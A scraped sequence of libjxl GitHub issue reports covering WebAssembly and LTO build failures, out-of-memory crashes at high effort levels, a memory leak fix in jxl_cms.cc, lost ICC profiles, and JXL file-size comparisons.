RuntimeError: Aborted(OOM). Build with -sASSERTIONS for more info.
at abort (/workspaces/codecs/packages/libjxl/extern/libjxl/build-wasm32/encode_oneshot.js:2:7496)
at abortOnCannotGrowMemory (/workspaces/codecs/packages/libjxl/extern/libjxl/build-wasm32/encode_oneshot.js:2:79026)
at _emscripten_resize_heap (/workspaces/codecs/packages/libjxl/extern/libjxl/build-wasm32/encode_oneshot.js:2:79129)
at wasm://wasm/009c9f8e:wasm-function[319]:0x4340c
at wasm://wasm/009c9f8e:wasm-function[55]:0x4096
at wasm://wasm/009c9f8e:wasm-function[391]:0x55487
at wasm://wasm/009c9f8e:wasm-function[116]:0xa78c
at wasm://wasm/009c9f8e:wasm-function[585]:0x9f4c5
at wasm://wasm/009c9f8e:wasm-function[1403]:0x1e6f02
at wasm://wasm/009c9f8e:wasm-function[1692]:0x1f8665
**Environment**
- OS: Docker build environment as specified in the debian and wasm build instructions
- Compiler version: [e.g. clang 11.0.1]
- CPU type: [e.g. x86_64]
- cjxl/djxl version string: [e.g. cjxl [v0.3.7 | SIMD supported: SSE4,Scalar]]
**Additional context**
Add any other context about the problem here.
Tried settings allow memory growth and higher size limits, but I get the same issues. Other builds I've tried to create WASM environments also encounter what I think is the same issue, although I haven't finished debugging it to know for sure.
| WASM oneshot encoder build out of memory on test.pfm example | https://api.github.com/repos/libjxl/libjxl/issues/4177/comments | 2 | 2025-04-01T17:34:33Z | 2025-05-06T11:50:14Z | https://github.com/libjxl/libjxl/issues/4177 | 2,964,126,955 | 4,177 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/lib/extras/enc/jpegli.cc line 390
Code:
std::vector<uint8_t> pixels; // <-- unused | unused variable | https://api.github.com/repos/libjxl/libjxl/issues/4175/comments | 0 | 2025-03-31T14:26:40Z | 2025-03-31T14:26:40Z | https://github.com/libjxl/libjxl/issues/4175 | 2,960,670,018 | 4,175 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
32bit libjxl crashes when compressing larger images (1280x1024 is enough, 1920x1080 is certain) at levels 10 and 11 because it tries to allocate/use too much RAM (over 2GB).
**To Reproduce**
**Expected behavior**
No crash. The library should probably keep track of its memory allocations. If that's not feasible or will result in a major slowdown, you could/should print a warning that this operation may result in a crash. It's really up to you to decide.
**Screenshots**
N/a.
**Environment**
- OS: any 32bit environment
- Compiler version: any
- CPU type: any
- cjxl/djxl version string: 0.11.1 | 32bit JXL crashes when compressing larger images at compression levels 10 and 11 | https://api.github.com/repos/libjxl/libjxl/issues/4167/comments | 6 | 2025-03-29T15:56:29Z | 2025-06-19T22:48:30Z | https://github.com/libjxl/libjxl/issues/4167 | 2,958,167,946 | 4,167 |
[
"libjxl",
"libjxl"
] | There is a memory leak in the `GetContext` function in jxl_cms.cc. This function uses a `static thread_local` variable to allocate a CMS "context" object, by calling `cmsCreateContext`. But the code never invokes `cmsDeleteContext`, so one of these objects is being leaked for each thread.
The problematic code looks like this:
```
cmsContext GetContext() {
static thread_local void* context_;
if (context_ == nullptr) {
context_ = cmsCreateContext(nullptr, nullptr);
```
I have tried out a fix using `std::unique_ptr` that seems to work fine.
```
cmsContext GetContext() {
static thread_local std::unique_ptr<void, void(*)(void*)> context_(nullptr, [](void* ptr)
{
if (ptr != nullptr) cmsDeleteContext(static_cast<cmsContext>(ptr));
});
if (context_ == nullptr) {
context_.reset(cmsCreateContext(nullptr, nullptr));
JXL_DASSERT(context_ != nullptr);
cmsSetLogErrorHandlerTHR(static_cast<cmsContext>(context_.get()), &ErrorHandler);
}
return static_cast<cmsContext>(context_.get());
}
```
If you agree, I would like someone to create a PR to submit this fix.
| Memory leak in jxl_cms.cc | https://api.github.com/repos/libjxl/libjxl/issues/4166/comments | 0 | 2025-03-29T09:24:55Z | 2025-03-29T09:24:55Z | https://github.com/libjxl/libjxl/issues/4166 | 2,957,891,506 | 4,166 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
When an input file in JXL format has an alpha channel and a color profile, removing the alpha channel using ImageMagick will also drop the color profile, which can't subsequently be reapplied with `magick` or `cjxl`.
**To Reproduce**
Using the attached file `f42-01-day.jxl` as an example:
```console
$ # Original file has alpha channel, embedded color profile
$ magick identify -verbose f42-01-day.jxl |grep -E -i '(alpha|icc)'
Type: TrueColorAlpha
Alpha: 1-bit
Alpha:
Profile-icc: 9080 bytes
icc:copyright: Copyright 2015, Elle Stone (website: http://ninedegreesbelow.com/; email: ellestone@ninedegreesbelow.com). This ICC profile is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License (https://creativecommons.org/licenses/by-sa/3.0/legalcode).
icc:description: sRGB-elle-V2-srgbtrc.icc
$ # Remove alpha channel using ImageMagick
$ magick f42-01-day.jxl -quality 100 -alpha off f42-01-day_noalpha.jxl
$ # Resulting file has no alpha, but no profile as well
$ magick identify -verbose f42-01-day_noalpha.jxl |grep -E -i '(alpha|icc)'
Filename: f42-01-day_noalpha.jxl
Profile-icc: 536 bytes
icc:copyright: CC0
icc:description: RGB_D65_SRG_Rel_SRG
$ # Extract and attempt to reapply ICC profile
$ djxl f42-01-day.jxl f42-01-day.exif --icc_out=f42-01-day.icc -v -v -v
JPEG XL decoder v0.10.4 [SSE2]
Read 2030921 compressed bytes.
Decoded to pixels.
Encoding decoded image
Wrote output to f42-01-day.exif
4032 x 3024, 10758.651 MP/s [10758.65, 10758.65], , 1 reps, 2 threads.
$ # (exif file is empty, but icc file contains profile:)
$ file f42-01-day.icc
f42-01-day.icc: color profile 2.1, type lcms, RGB/XYZ-mntr device by lcms, 9080 bytes, 10-11-2015 12:18:56 "sRGB-elle-V2-srgbtrc.icc"
$ # Attempt to reapply to converted, alpha-stripped JXL using cjxl
$ cjxl f42-01-day_noalpha.jxl f42-01-day_new.jxl --quality=100 \
--lossless_jpeg=1 -x icc_profile=f42-01-day.icc -v -v -v
JPEG XL encoder v0.10.4 [SSE2]
Read 4032x3024 image, 2165766 bytes, 8.9 MP/s
Encoding [Modular, lossless, effort: 7]
Compressed to 2165.8 kB (1.421 bpp).
4032 x 3024, 0.663 MP/s [0.66, 0.66], , 1 reps, 2 threads.
$ # Output file still has no embedded profile
$ magick identify -verbose f42-01-day_new.jxl |grep -E -i '(alpha|icc)'
Profile-icc: 536 bytes
icc:copyright: CC0
icc:description: RGB_D65_SRG_Rel_SRG
```
**Expected behavior**
Profile is preserved during initial conversion with ImageMagick, and/or reapplied by cjxl when requested.
In addition, if cjxl ignores or rejects `-x icc_profile=` or any other option, some sort of message to that effect (along with, ideally, an explanation why) should be included in at least `cjxl -v -v -v` output. Silently not applying options set during conversion isn't particularly helpful.
**Input file**
`f42-01-day.jxl` in zip container: [f42-01-day.zip](https://github.com/user-attachments/files/19495672/f42-01-day.zip)
**Environment**
- OS: Fedora 41
- Compiler version: gcc 14.2.1
- CPU type: x86_64
- cjxl/djxl version string: cjxl v0.10.4 [SSE2]
**Additional context**
The input file is one of the background images which will be included in the upcoming Fedora 42. The background format is changing from PNG to JXL with this release.
However, due to a bug in the background handling code, to avoid graphical corruption PNG or JXL backgrounds _must not_ have an alpha channel.
The original source file is a Krita document, which is being exported to JXL from Krita. Krita's export process does not provide the option to export without an alpha channel -- if the output format supports alpha (as JXL does), it will be included in the export. Hence the need to remove the alpha channel post-export.
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| losing color profile when ImageMagick converts JXL -> JXL to remove alpha, can't reapply with libjxl / cjxl | https://api.github.com/repos/libjxl/libjxl/issues/4164/comments | 4 | 2025-03-27T23:47:56Z | 2025-03-30T18:40:26Z | https://github.com/libjxl/libjxl/issues/4164 | 2,954,682,159 | 4,164 |
[
"libjxl",
"libjxl"
] | In relation to #2284, cjpegli generates subsampled RGB JPEGs by default when `--xyb` is used. JPEG XL only supports transcoding 4:4:4 RGB JPEGs, causing an error unless `--chroma_subsampling 444` is also specified.
As Jon said in the other issue, not being able to transcode to JXL is shooting ourselves in the foot. Changing the default to 4:4:4 would allow transcoding while also increasing quality at a minor size penalty.
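A sketch of the current workaround, using only the flags already mentioned above (file names are placeholders): forcing 4:4:4 at the cjpegli stage keeps the result transcodable:

```sh
# Produce an XYB JPEG without chroma subsampling (transcodable to JXL):
cjpegli input.png out.jpg --xyb --chroma_subsampling 444
# Losslessly recompress the resulting 4:4:4 JPEG into a JXL container:
cjxl out.jpg out.jxl --lossless_jpeg=1
```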
Doing a quick test, 4:4:4 is 7% larger with a 2.6-point higher SSIMULACRA2 score, and JXL transcoding increases the score by another 1.15 while being 7.5% smaller than the current XYB JPEG output. | cjpegli XYB defaults to non-transcodable output | https://api.github.com/repos/libjxl/libjxl/issues/4163/comments | 1 | 2025-03-26T02:16:01Z | 2025-04-25T21:16:11Z | https://github.com/libjxl/libjxl/issues/4163 | 2,948,210,794 | 4,163 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Here is a [photo of a bird](https://www.lovethegarden.com/sites/default/files/content/articles/UK_wildbirds-10-house-sparrow.jpg).
Here are the sizes of different encodings of the bird using `libjxl`'s `cjxl` command-line tool, using default `--effort=7`.
Description | Size (kB) | Command
-------------------------------------|-----------|--------------------------------
JPG (original) | 101 | -
JXL (lossless, transcoded) | 88 | `./cjxl bird.jpg bird-transcoded.jxl`
JXL (lossless, transcoded, prog.) | 92 | `./cjxl bird.jpg bird-transcoded-progressive.jxl -p`
JXL (visually lossless) | 146 | `./cjxl bird.jpg bird-visually-lossless.jxl --lossless_jpeg=0 --quality=90`
JXL (visually lossless, progressive) | 160 | `./cjxl bird.jpg bird-visually-lossless-progressive.jxl --lossless_jpeg=0 --quality=90 -p`
JXL (lossless) | 641 | `./cjxl bird.jpg bird-lossless.jxl --lossless_jpeg=0 --quality=100`
JXL (lossless, progressive) | 1941 | `./cjxl bird.jpg bird-lossless-progressive.jxl --lossless_jpeg=0 --quality=100 -p`
PNG (lossless) | 1137 | IrfanView
Here are the same, but with `--effort=10`.
Description | Size (kB) | Command
-------------------------------------|-----------|--------------------------------
JPG (original) | 101 | -
JXL (lossless, transcoded) | 87 | `./cjxl bird.jpg bird-transcoded-effort.jxl --effort=10`
JXL (lossless, transcoded, prog.) | 91 | `./cjxl bird.jpg bird-transcoded-progressive-effort.jxl -p --effort=10`
JXL (visually lossless) | 150 | `./cjxl bird.jpg bird-visually-lossless-effort.jxl --lossless_jpeg=0 --quality=90 --effort=10`
JXL (visually lossless, progressive) | 163 | `./cjxl bird.jpg bird-visually-lossless-progressive-effort.jxl --lossless_jpeg=0 --quality=90 -p --effort=10`
JXL (lossless) | 610 | `./cjxl bird.jpg bird-lossless-effort.jxl --lossless_jpeg=0 --quality=100 --effort=10`
JXL (lossless, progressive) | 1095 | `./cjxl bird.jpg bird-lossless-progressive-effort.jxl --lossless_jpeg=0 --quality=100 -p --effort=10`
PNG (lossless) | 1137 | IrfanView
**To Reproduce**
See above.
**Expected behavior**
I was expecting JPEG XL visually lossless encoding to be smaller or of comparable size to JPEG, but instead it is about 1.5x in size. Increasing effort did not help.
**Environment**
- OS: Linux Ubuntu (Windows Subsystem for Linux in Windows 11)
- Compiler version: Ubuntu clang version 14.0.0-1ubuntu1.1
- CPU type: x64
- cjxl version string: JPEG XL encoder v0.12.0 798512a9 [_AVX2_,SSE4,SSE2]
| Encoding a JPEG as JXL increases size | https://api.github.com/repos/libjxl/libjxl/issues/4162/comments | 8 | 2025-03-24T18:35:58Z | 2025-03-25T23:45:35Z | https://github.com/libjxl/libjxl/issues/4162 | 2,944,141,598 | 4,162 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Encoder is broken in a special case
[bugreport.tar.gz](https://github.com/user-attachments/files/19368999/bugreport.tar.gz)
**To Reproduce**
Steps to reproduce the behavior:
(intended to be reproduced on a Debian system)
1. Uncompress the file bugreport.tar.gz
2. `cd bugreport`
3. `bash bugreport.sh`
**Expected behavior**
No error message. Compressed image is produced.
**Screenshots**
For the output on my system, see the file bugreport.log.
**Environment**
- OS: [Windows,Linux,?]
- Compiler version: [unknown]
- CPU type: [x86_64]
- cjxl version string: [cjxl v0.12.0 798512a [_AVX2_,SSE4,SSE2]]
| Image cannot be encoded with -m 1 -e 9 -q 48, Logic error: couldn't rebalance a histogram | https://api.github.com/repos/libjxl/libjxl/issues/4159/comments | 3 | 2025-03-20T14:38:11Z | 2025-04-11T12:32:19Z | https://github.com/libjxl/libjxl/issues/4159 | 2,935,721,925 | 4,159 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I am unable to build libjxl for WebAssembly.
I am following [this page](https://github.com/libjxl/libjxl/blob/main/doc/building_wasm.md).
**To Reproduce**
To be precise, starting from scratch, the steps to reproduce in Ubuntu in Windows Subsystem for Linux are:
```bash
sudo apt-get update
sudo apt install cmake
sudo apt install ninja-build
cd ~
git clone https://github.com/emscripten-core/emsdk.git
cd emsdk
./emsdk install latest
./emsdk activate latest
source ./emsdk_env.sh
cd ~
git clone https://github.com/libjxl/libjxl.git
cd libjxl
git submodule update --init --recursive
BUILD_TARGET=wasm32 emconfigure ./ci.sh release
```
The last line is the failing one, and produces the following:
```bash
(base) kaba@Laptop-2593:~/libjxl$ BUILD_TARGET=wasm32 emconfigure ./ci.sh release
configure: ./ci.sh release
+ cmd_release
+ CMAKE_BUILD_TYPE=Release
+ strip_dead_code
+ [[ wasm32 == wasm* ]]
+ return 0
+ cmake_configure
+ export_env
+ [[ wasm32 == *mingw32 ]]
++ /home/kaba/emsdk/upstream/emscripten/emcc -print-prog-name=llvm-symbolizer
emcc: error: no input files
++ true
+ LLVM_SYMBOLIZER=
+ [[ -n '' ]]
+ [[ 0 == 1 ]]
+ args=('-B/home/kaba/libjxl/build-wasm32' '-H/home/kaba/libjxl' '-DCMAKE_BUILD_TYPE=Release' '-G' 'Ninja' '-DCMAKE_CXX_FLAGS= ' '-DCMAKE_C_FLAGS= ' '-DCMAKE_EXE_LINKER_FLAGS=' '-DCMAKE_MODULE_LINKER_FLAGS=' '-DCMAKE_SHARED_LINKER_FLAGS=' '-DJPEGXL_VERSION=' '-DSANITIZER=none' '-DJPEGXL_ENABLE_VIEWERS=ON' '-DJPEGXL_ENABLE_PLUGINS=ON' '-DJPEGXL_ENABLE_DEVTOOLS=ON' '-DJPEGXL_FUZZER_LINK_FLAGS=-fsanitize=fuzzer')
+ local args
+ [[ wasm32 != *mingw32 ]]
+ args+=(-DJPEGXL_WARNINGS_AS_ERRORS=ON)
+ [[ -n wasm32 ]]
+ local system_name=Linux
+ [[ wasm32 == *mingw32 ]]
+ [[ wasm32 != wasm* ]]
+ args+=(-DSJPEG_ENABLE_SIMD=OFF -DBUILD_SHARED_LIBS=OFF)
+ args+=(-DCMAKE_CROSSCOMPILING=1 -DHAVE_STD_REGEX=0 -DHAVE_POSIX_REGEX=0 -DHAVE_GNU_POSIX_REGEX=0 -DHAVE_STEADY_CLOCK=0 -DHAVE_THREAD_SAFETY_ATTRIBUTES=0)
+ [[ -z '' ]]
+ CMAKE_FIND_ROOT_PATH=/usr/wasm32
+ [[ -z '' ]]
+ CMAKE_PREFIX_PATH=/usr/wasm32
++ which wasm32-pkg-config
++ true
+ local pkg_config=
+ [[ -z '' ]]
++ which pkg-config
+ pkg_config=
+ retcode=1
emconfigure: error: './ci.sh release' failed (returned 1)
```
The culprit is this line which is executed by `ci.sh:291`:
```bash
LLVM_SYMBOLIZER=$("${CC:-clang}" -print-prog-name=llvm-symbolizer || true)
```
which expands to:
```bash
emcc -print-prog-name=llvm-symbolizer
```
Running it in isolation results in
```
emcc: error: no input files
```
Because emcc errors here, so does the `ci.sh` script.
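For what it's worth, the `$(... || true)` construct on that line should, in isolation, let a `set -e` script continue past the failing probe (the error text still lands on stderr, which makes the trace look like a hard failure). A minimal sketch with a stand-in for the `emcc` call:

```sh
#!/bin/sh
set -e
# Stand-in for `emcc -print-prog-name=llvm-symbolizer`: prints an error
# to stderr and exits non-zero, like the real probe does here.
probe() { echo "emcc: error: no input files" >&2; return 1; }

# `|| true` keeps `set -e` from aborting; 2>/dev/null hides the noise.
LLVM_SYMBOLIZER=$(probe 2>/dev/null || true)
echo "script continued, LLVM_SYMBOLIZER='${LLVM_SYMBOLIZER}'"
```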
As an attempt to work around this, I replaced line 291 with
```
LLVM_SYMBOLIZER=""
```
This allows the script to continue, but then it hits another error for which it gives no hint about what happened. However, I suspect that problem may be the TestBigEndian problem described below.
**Expected behavior**
Building for WebAssembly should succeed.
**Other stuff**
I also tried `emcmake` instead of `emconfigure`:
```
BUILD_TARGET=wasm32 emcmake cmake -G Ninja -B build
```
This results in the following:
```bash
(base) kaba@Laptop-2593:~/libjxl$ BUILD_TARGET=wasm32 emcmake cmake -G Ninja -B build
configure: cmake -G Ninja -B build -DCMAKE_TOOLCHAIN_FILE=/home/kaba/emsdk/upstream/emscripten/cmake/Modules/Platform/Emscripten.cmake -DCMAKE_CROSSCOMPILING_EMULATOR=/home/kaba/emsdk/node/20.18.0_64bit/bin/node
-- CMAKE_SYSTEM_PROCESSOR is x86_64
-- Could NOT find PkgConfig (missing: PKG_CONFIG_EXECUTABLE)
-- tcmalloc version -- tcmalloc 2.8.0 disabled due to https://github.com/gperftools/gperftools/issues/1204
-- Check if the system is big endian
-- Searching 16 bit integer
CMake Error at /usr/share/cmake-3.22/Modules/TestBigEndian.cmake:72 (message):
no suitable type found
Call Stack (most recent call first):
/usr/share/cmake-3.22/Modules/TestBigEndian.cmake:37 (__TEST_BIG_ENDIAN_LEGACY_IMPL)
CMakeLists.txt:119 (test_big_endian)
-- Configuring incomplete, errors occurred!
See also "/home/kaba/libjxl/build/CMakeFiles/CMakeOutput.log".
See also "/home/kaba/libjxl/build/CMakeFiles/CMakeError.log".
emcmake: error: 'cmake -G Ninja -B build -DCMAKE_TOOLCHAIN_FILE=/home/kaba/emsdk/upstream/emscripten/cmake/Modules/Platform/Emscripten.cmake -DCMAKE_CROSSCOMPILING_EMULATOR=/home/kaba/emsdk/node/20.18.0_64bit/bin/node' failed (returned 1)
```
The culprit here is the failure of CMake's TestBigEndian:
```bash
CMake Error at /usr/share/cmake-3.22/Modules/TestBigEndian.cmake:72 (message):
no suitable type found
```
I think Emscripten is supposed to override this test, as can be seen from [here](https://github.com/emscripten-core/emscripten/blob/main/cmake/Modules/TestBigEndian.cmake). I'd assume `emcmake` would do that, but for some reason this file is not picked up. This can be seen from the above error message, because it refers to
```/usr/share/cmake-3.22/Modules/TestBigEndian.cmake```
However, Emscripten's version is at:
```~/emsdk/upstream/emscripten/cmake/Modules/TestBigEndian.cmake```
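A possible workaround (an untested guess on my side): pass Emscripten's module directory explicitly, since `include(TestBigEndian)` searches `CMAKE_MODULE_PATH` before CMake's own `Modules` directory:

```sh
# hypothetical: force Emscripten's CMake modules to take precedence
BUILD_TARGET=wasm32 emcmake cmake -G Ninja -B build \
  -DCMAKE_MODULE_PATH="$HOME/emsdk/upstream/emscripten/cmake/Modules"
```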
**Environment**
- OS: Ubuntu 22.04.2 LTS (Windows Subsystem for Linux in Windows 11)
- Compiler version: emcc (Emscripten gcc/clang-like replacement + linker emulating GNU ld) 4.0.5 (53b38d0c6f9fce1b62c55a8012bc6477f7a42711)
- CPU type: x64
- cjxl/djxl version string: ?? latest clone of libjxl from github
| Cannot build libjxl for Webassembly | https://api.github.com/repos/libjxl/libjxl/issues/4158/comments | 1 | 2025-03-20T01:17:49Z | 2025-03-20T04:42:44Z | https://github.com/libjxl/libjxl/issues/4158 | 2,933,654,311 | 4,158 |
[
"libjxl",
"libjxl"
] | The current build of cjxl fails after a few seconds when attempting to encode a particular image using -e 11.
```
D:\>cjxl awd.png awd.jxl -d 0 --allow_expert_options -e 11
JPEG XL encoder v0.12.0 0f2d2f7 [_AVX2_,SSE2]
Encoding [Modular, lossless, effort: 11]
JxlEncoderProcessOutput failed.
EncodeImageJXL() failed.
```
The attached PNG image triggers the error.
[PNG file](https://github.com/user-attachments/assets/36dd0e6f-94e2-4e6b-891b-84f9a22cec38) | cjxl -e 11 fails on a small image | https://api.github.com/repos/libjxl/libjxl/issues/4157/comments | 5 | 2025-03-19T22:31:30Z | 2025-04-12T06:35:12Z | https://github.com/libjxl/libjxl/issues/4157 | 2,933,351,582 | 4,157 |
[
"libjxl",
"libjxl"
] | **Describe the solution you'd like**
Research version: add stronger lossless compression methods, like context mixing (CM), advanced wavelets, etc.
I did a first test, and for some images ZPAQ beats jxl e10. JXL is slowly becoming the standard (even Microsoft has added a decoder), so it would be worth preparing an extension (experimental version) and a decoder compatible with the old standard.
I asked ChatGPT for methods that are not used yet; its list:
1) Block-wise BWT + MTF stages for modular or transformed data.
2) CMYK-tailored predictors optimized for print-oriented content.
3) Optional wavelet-based transforms for low-frequency-heavy images.
4) Adaptive channel decorrelation based on local channel correlation.
5) Joint bit-level context modeling across channels for specialized datasets.
6) Context Mixing
It would be appreciated to know which algorithms are already in use. Thanks. | Research Vers? | https://api.github.com/repos/libjxl/libjxl/issues/4156/comments | 1 | 2025-03-18T12:23:55Z | 2025-03-19T12:44:25Z | https://github.com/libjxl/libjxl/issues/4156 | 2,928,335,941 | 4,156 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Example executables do not run on Windows, because `jxl.dll` is placed in the `lib` directory, not in the directory where the executables are.
**To Reproduce**
* Build under Windows.
* Go to the build directory: `cd c:\code\libjxl\out\build\x64-Clang-Release`
* Run `encode_oneshot`.
* Get Windows error on not finding `jxl.dll`.
**Expected behavior**
Running `encode_oneshot` and other example executables should work out of the box.
**Environment**
- OS: Windows 11
- Compiler version: Visual Studio 2022 17.13.3 (but built using its Clang)
- CPU type: x64
**Additional context**
I can think of several ways to solve the problem:
* Option 1: Move the executables into the `\lib` directory. This is simple, but logically the example executables do not belong with the library.
* Option 2: Make the user add `lib` to the Windows `PATH` (i.e. the current situation). This is not nice.
* Option 3: Create a separate directory `\examples`, which contains the executables, as well as copies of `jxl.dll` (and whatever other files are needed to run them).
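For anyone hitting this, a local stop-gap (essentially Option 3 by hand; the path is the build directory from above, and the shell syntax assumes a POSIX-style shell such as Git Bash):

```sh
cd /c/code/libjxl/out/build/x64-Clang-Release
cp lib/jxl.dll .      # put the runtime DLL beside the example binaries
./encode_oneshot
```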
| Example executables do not run on Windows, because jxl.dll is contained in lib directory, not in root directory. | https://api.github.com/repos/libjxl/libjxl/issues/4155/comments | 0 | 2025-03-18T01:24:06Z | 2025-03-18T01:24:06Z | https://github.com/libjxl/libjxl/issues/4155 | 2,926,799,065 | 4,155 |
[
"libjxl",
"libjxl"
] | Dear maintainers,
in Debian a build of version 0.11.1 with LTO enabled was attempted (see [1] for the full build log on i386; other architectures failed with the same problem). When enabling LTO, there seems to be an undefined reference to `jxl::extras::PackedFrame::~PackedFrame()` for several tests, e.g.:
```
[334/418] : && /usr/bin/c++ -g -O2 -ffile-prefix-map=/build/reproducible-path/jpeg-xl-0.11.1=. -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat -Werror=format-security -fexcess-precision=fast -DJXL_DEBUG_WARNING -DJXL_DEBUG_ON_ERROR -Wdate-time -D_FORTIFY_SOURCE=2 -fno-rtti -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -fPIE -pie -Wl,--dependency-file=lib/CMakeFiles/color_description_test.dir/link.d lib/CMakeFiles/color_description_test.dir/extras/dec/color_description_test.cc.o -o lib/tests/color_description_test -Wl,-rpath,/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib lib/libjxl_testlib-internal.a lib/libjxl_extras-internal.a /usr/lib/i386-linux-gnu/libgtest_main.a /usr/lib/i386-linux-gnu/libgtest.a lib/libjxl-internal.a /usr/lib/i386-linux-gnu/libhwy.so /usr/lib/i386-linux-gnu/libbrotlidec.so /usr/lib/i386-linux-gnu/libbrotlicommon.so /usr/lib/i386-linux-gnu/libbrotlienc.so lib/libjxl_cms.so.0.11.1 lib/libjxl_threads.so.0.11.1 /usr/lib/i386-linux-gnu/libgif.so /usr/lib/i386-linux-gnu/libjpeg.so /usr/lib/i386-linux-gnu/libpng.so /usr/lib/i386-linux-gnu/libz.so /usr/lib/i386-linux-gnu/libOpenEXR-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRUtil-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRCore-3_1.so /usr/lib/i386-linux-gnu/libIex-3_1.so /usr/lib/i386-linux-gnu/libIlmThread-3_1.so /usr/lib/i386-linux-gnu/libImath-3_1.so && cd /build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib && /usr/bin/cmake -D TEST_TARGET=color_description_test -D TEST_EXECUTABLE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/tests/color_description_test -D TEST_EXECUTOR= -D TEST_WORKING_DIR=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib -D TEST_EXTRA_ARGS= -D TEST_PROPERTIES= -D TEST_PREFIX= -D TEST_SUFFIX= -D TEST_FILTER= -D NO_PRETTY_TYPES=FALSE -D NO_PRETTY_VALUES=FALSE -D TEST_LIST=color_description_test_TESTS -D 
CTEST_FILE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/color_description_test[1]_tests.cmake -D TEST_DISCOVERY_TIMEOUT=240 -D TEST_DISCOVERY_EXTRA_ARGS= -D TEST_XML_OUTPUT_DIR= -P /usr/share/cmake-3.31/Modules/GoogleTestAddTests.cmake
FAILED: lib/tests/color_description_test lib/color_description_test[1]_tests.cmake /build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/color_description_test[1]_tests.cmake
: && /usr/bin/c++ -g -O2 -ffile-prefix-map=/build/reproducible-path/jpeg-xl-0.11.1=. -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat -Werror=format-security -fexcess-precision=fast -DJXL_DEBUG_WARNING -DJXL_DEBUG_ON_ERROR -Wdate-time -D_FORTIFY_SOURCE=2 -fno-rtti -flto=auto -ffat-lto-objects -Wl,-z,relro -Wl,-z,now -fPIE -pie -Wl,--dependency-file=lib/CMakeFiles/color_description_test.dir/link.d lib/CMakeFiles/color_description_test.dir/extras/dec/color_description_test.cc.o -o lib/tests/color_description_test -Wl,-rpath,/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib lib/libjxl_testlib-internal.a lib/libjxl_extras-internal.a /usr/lib/i386-linux-gnu/libgtest_main.a /usr/lib/i386-linux-gnu/libgtest.a lib/libjxl-internal.a /usr/lib/i386-linux-gnu/libhwy.so /usr/lib/i386-linux-gnu/libbrotlidec.so /usr/lib/i386-linux-gnu/libbrotlicommon.so /usr/lib/i386-linux-gnu/libbrotlienc.so lib/libjxl_cms.so.0.11.1 lib/libjxl_threads.so.0.11.1 /usr/lib/i386-linux-gnu/libgif.so /usr/lib/i386-linux-gnu/libjpeg.so /usr/lib/i386-linux-gnu/libpng.so /usr/lib/i386-linux-gnu/libz.so /usr/lib/i386-linux-gnu/libOpenEXR-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRUtil-3_1.so /usr/lib/i386-linux-gnu/libOpenEXRCore-3_1.so /usr/lib/i386-linux-gnu/libIex-3_1.so /usr/lib/i386-linux-gnu/libIlmThread-3_1.so /usr/lib/i386-linux-gnu/libImath-3_1.so && cd /build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib && /usr/bin/cmake -D TEST_TARGET=color_description_test -D TEST_EXECUTABLE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/tests/color_description_test -D TEST_EXECUTOR= -D TEST_WORKING_DIR=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib -D TEST_EXTRA_ARGS= -D TEST_PROPERTIES= -D TEST_PREFIX= -D TEST_SUFFIX= -D TEST_FILTER= -D NO_PRETTY_TYPES=FALSE -D NO_PRETTY_VALUES=FALSE -D TEST_LIST=color_description_test_TESTS -D CTEST_FILE=/build/reproducible-path/jpeg-xl-0.11.1/obj-i686-linux-gnu/lib/color_description_test[1]_tests.cmake -D 
TEST_DISCOVERY_TIMEOUT=240 -D TEST_DISCOVERY_EXTRA_ARGS= -D TEST_XML_OUTPUT_DIR= -P /usr/share/cmake-3.31/Modules/GoogleTestAddTests.cmake
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::PackedImage::BitsPerChannel(JxlDataType)':
./obj-i686-linux-gnu/./lib/extras/packed_image.h:100:(.text+0x1b3): undefined reference to `jxl::Debug(char const*, ...)'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::DecodeImageEXR(jxl::Span<unsigned char const>, jxl::extras::ColorHints const&, jxl::extras::PackedPixelFile*, jxl::SizeConstraints const*)':
./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:124:(.text+0x2b9): undefined reference to `jxl::StatusMessage(jxl::Status, char const*, ...)'
/usr/bin/ld: ./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:153:(.text+0x4db): undefined reference to `jxl::extras::PackedFrame::Create(unsigned int, unsigned int, JxlPixelFormat const&)'
/usr/bin/ld: ./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:153:(.text+0x514): undefined reference to `jxl::StatusMessage(jxl::Status, char const*, ...)'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::PackedFrame& std::vector<jxl::extras::PackedFrame, std::allocator<jxl::extras::PackedFrame> >::emplace_back<jxl::extras::PackedFrame>(jxl::extras::PackedFrame&&)':
